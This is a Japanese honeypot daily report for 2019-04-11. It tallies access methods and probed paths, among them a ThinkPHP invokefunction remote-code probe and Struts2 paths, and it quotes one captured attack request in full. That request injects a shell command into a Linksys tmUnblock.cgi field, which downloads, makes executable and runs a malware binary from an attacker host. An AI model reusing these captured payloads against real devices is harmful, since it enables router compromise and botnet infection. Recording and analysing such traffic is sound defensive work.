2019-04-11のアクセス数は64件でした。
■送信元IPアドレスの数は 51件です。
■メソッドの一覧と件数は以下です。
method | 総数 – method |
GET | 55 |
HEAD | 4 |
POST | 5 |
合計 結果 | 64 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 – method |
/ | GET | 43 |
/ | HEAD | 3 |
/acadmin.php | GET | 1 |
/favicon.ico | GET | 1 |
/index.action | GET | 1 |
/index.do | GET | 1 |
/manager/html | GET | 1 |
/PSIA/index | GET | 1 |
/struts2-rest-showcase/orders.xhtml | GET | 1 |
/tmUnblock.cgi | GET | 1 |
/tmUnblock.cgi | POST | 2 |
/TP/public/index.php | GET | 2 |
/TP/public/index.php?s=captcha | POST | 2 |
/TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | GET | 2 |
/users?page=&size=5 | POST | 1 |
http://112.124.42.80:63435/ | HEAD | 1 |
気になるlog
-=-=31件目のlog=-=-
[2019-04-11 07:52:27+0900] 122.97.128.130 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.flexsecurity.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start
linksysの脆弱性からのマルウェアダウンロード。
cnc[.]flexsecurity[.]xyz は調査時点で名前解決できず、調査できなかった。
huntinglogに差分が発生したらアラート投げるスクリプト、書きたくなってきた。
URLのvitustotalの結果はこちら